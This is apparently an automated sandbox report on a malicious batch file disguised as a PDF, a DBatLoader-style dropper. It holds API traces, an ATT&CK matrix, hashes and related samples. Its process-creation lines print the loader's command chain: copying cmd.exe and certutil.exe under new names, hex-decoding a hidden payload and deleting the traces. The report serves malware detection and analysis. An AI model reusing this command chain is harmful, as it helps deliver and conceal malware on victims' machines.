Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA25C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA26DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C19F8 #359,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA265E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA26B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA22D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA26D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2A3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2A511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4A63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4993B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD498FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4993B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD498FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2F4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2F53E0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4993B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD498FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD4993B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD498FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2A7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA294AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2A4E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4951EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD486EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD493140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4951EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD486EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD493140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2F3800 LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4951EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD486EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD493140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF7CD4951EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF7CD493140
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4A8654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF7CD4A8654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A6CB4 ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,LocalFree,LocalFree,7_2_00007FF6AA2A6CB4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48586C GetVersion,4_2_00007FF7CD48586C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF6AA20227C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF6AA21E568
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2054A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF6AA2054A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA225648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF6AA225648
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | Windows Management Instrumentation | 2 Valid Accounts | 2 Valid Accounts | 111 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | 21 Access Token Manipulation | 2 Valid Accounts | LSASS Memory | 2 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 11 Process Injection | 2 Disable or Modify Tools | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 21 Access Token Manipulation | NTDS | 1 System Owner/User Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 25 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Install Root Certificate | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1569105 | Sample: 1x40 CONTAINER.PDF-.bat | Start date: 05/12/2024 | Architecture: WINDOWS | Score: 76

Signatures on the sample:
  • Malicious sample detected (through community Yara rule)
  • Found large BAT file
  • Sigma detected: Execution from Suspicious Folder
  • Sigma detected: Parent in Public Folder Suspicious Process

Process tree:
  • cmd.exe (started from the sample)
    • extrac32.exe: dropped C:\Users\Public\alpha.exe (PE32+); Drops PE files to the user root directory; Drops or copies certutil.exe with a different name (likely to bypass HIPS); Drops or copies cmd.exe with a different name (likely to bypass HIPS)
    • alpha.exe
      • kn.exe: Registers a new ROOT certificate
    • alpha.exe
      • extrac32.exe: dropped C:\Users\Public\kn.exe (PE32+)
    • 4 other processes
      • kn.exe

No Antivirus matches
Source | Detection | Scanner
C:\Users\Public\alpha.exe | 0% | ReversingLabs
C:\Users\Public\kn.exe | 0% | ReversingLabs
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | false | | high
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | kn.exe | false | | high
https://login.microsoftonline.com/%s/oauth2/authorize | kn.exe | false | | high
https://login.microsoftonline.com/%s/oauth2/token | kn.exe | false | | high
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | false | | high
https://%ws/%ws_%ws_%ws/service.svc/%ws | kn.exe | false | | high
https://enterpriseregistration.windows.net/EnrollmentServer/device/ | kn.exe | false | | high
https://enterpriseregistration.windows.net/EnrollmentServer/key/ | kn.exe | false | | high
                  No contacted IP infos
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1569105
                  Start date and time:2024-12-05 13:22:17 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 23s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:1x40 CONTAINER.PDF-.bat
                  Detection:MAL
                  Classification:mal76.bank.evad.winBAT@20/8@0/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 61
                  • Number of non-executed functions: 205
                  Cookbook Comments:
                  • Found application associated with file extension: .bat
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • VT rate limit hit for: 1x40 CONTAINER.PDF-.bat
                  No simulations
                  No context
                  Match | Associated Sample Name / URL | Detection | Threat Name
                  C:\Users\Public\alpha.exe | saw.bat | malicious | Remcos, DBatLoader
                  C:\Users\Public\alpha.exe | A1 igazol#U00e1s.cmd | malicious | DBatLoader, FormBook
                  C:\Users\Public\alpha.exe | Documentazione_Doganale_richieste_di_copia.cmd | malicious | DBatLoader
                  C:\Users\Public\alpha.exe | 78326473_PDF.cmd | malicious | DBatLoader
                  C:\Users\Public\alpha.exe | iuhmzvlH.cmd | malicious | Unknown
                  C:\Users\Public\alpha.exe | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader
                  C:\Users\Public\alpha.exe | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
                  C:\Users\Public\alpha.exe | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
                  C:\Users\Public\alpha.exe | #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd | malicious | Unknown
                  C:\Users\Public\alpha.exe | #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd | malicious | DBatLoader, FormBook
                                      Process:C:\Windows\System32\extrac32.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:modified
                                      Size (bytes):289792
                                      Entropy (8bit):6.135598950357573
                                      Encrypted:false
                                      SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                      MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                      SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                      SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: saw.bat, Detection: malicious, Browse
                                      • Filename: A1 igazol#U00e1s.cmd, Detection: malicious, Browse
                                      • Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious, Browse
                                      • Filename: 78326473_PDF.cmd, Detection: malicious, Browse
                                      • Filename: iuhmzvlH.cmd, Detection: malicious, Browse
                                      • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                      • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                      • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\extrac32.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:modified
                                      Size (bytes):1651712
                                      Entropy (8bit):6.144018815244304
                                      Encrypted:false
                                      SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                      MD5:F17616EC0522FC5633151F7CAA278CAA
                                      SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                      SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                      SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................
                                      Process:C:\Users\Public\alpha.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):104
                                      Entropy (8bit):4.403504238247217
                                      Encrypted:false
                                      SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                      MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                      SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                      SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                      SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                      Malicious:false
                                      Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...
                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                      Entropy (8bit):4.969115739297388
                                      TrID:
                                      • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                      • MP3 audio (1001/1) 33.33%
                                      File name:1x40 CONTAINER.PDF-.bat
